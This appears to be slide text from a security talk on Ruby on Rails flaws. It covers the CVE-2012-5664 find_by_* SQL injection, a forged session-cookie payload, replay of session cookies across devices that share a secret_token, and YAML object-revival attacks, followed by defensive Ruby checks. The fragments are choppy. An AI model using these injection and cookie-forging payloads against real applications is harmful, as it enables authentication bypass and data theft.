• Unfortunately there is^Wwas a certain quirk in RoR with the find_by_* methods (also known as CVE-2012-5664):
  > User.find_by_id({:select =>"* from users limit 1 "})
  User Load (0.5ms) SELECT * from users limit 1 FROM "users" WHERE "users"."id" IS NULL LIMIT 1
  => #<User id: 1, [… all the fun stuff]
a lot (and even more do I):
  {"session_id" => "41414141", "user_credentials"=>"Phenoelit", "user_credentials_id"=>{ :select=> " *,\"Phenoelit\" as persistence_token from Users " }}
the same secret_token → Instant win
• Buy one device, create an admin account, log in as admin.
• Observe the session cookie
• Reuse the session cookie against all the other devices =)
Constructor is bypassed
  – Objects are allocated and instance variables are set
• So, what if:
  – One can YAML.encode some Object out of the Rails std. library which implements a custom [] method
  – Railsapp thinks it has a Hash object and calls ["somemember"] on it
  – => things might go wrong ™
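Two defensive checks that address the find_by_* bullet and the YAML bullet above, as an added example (not code from the slides; the function names and the sample inputs are constructed for illustration): the first refuses a Hash where find_by_* expects an id, the second decodes a YAML session blob with YAML.safe_load so a tagged object cannot be revived in place of a Hash.

```ruby
require "yaml"

# Check 1: an id handed to find_by_* must be a plain integer, never a Hash
# such as { :select => "..." } (the CVE-2012-5664 shape shown above).
# Returns [:ok, Integer] or [:rejected, reason].
def check_record_id(value)
  case value
  when Integer
    [:ok, value]
  when String
    return [:rejected, "id is not a decimal integer"] unless value.match?(/\A\d+\z/)
    [:ok, value.to_i]
  else
    [:rejected, "id must be a scalar, got #{value.class}"]
  end
end

# Check 2: decode a YAML blob without reviving arbitrary objects.
# YAML.safe_load only builds core types, so a !ruby/object mapping that would
# masquerade as a Hash raises Psych::DisallowedClass instead of being allocated.
# Returns [:ok, data] or [:rejected, reason].
def check_session_yaml(yaml)
  [:ok, YAML.safe_load(yaml)]
rescue Psych::DisallowedClass, Psych::SyntaxError => e
  [:rejected, e.message]
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs modelled on the cookie shown above.
  p check_record_id("41414141")                                # [:ok, 41414141]
  p check_record_id({ :select => "* from users limit 1 " })    # [:rejected, ...]
  p check_session_yaml("--- !ruby/object:SomeRailsClass\nfoo: 1\n")  # [:rejected, ...]
  p check_session_yaml("---\nsession_id: '41414141'\n")       # [:ok, {"session_id"=>"41414141"}]
end
```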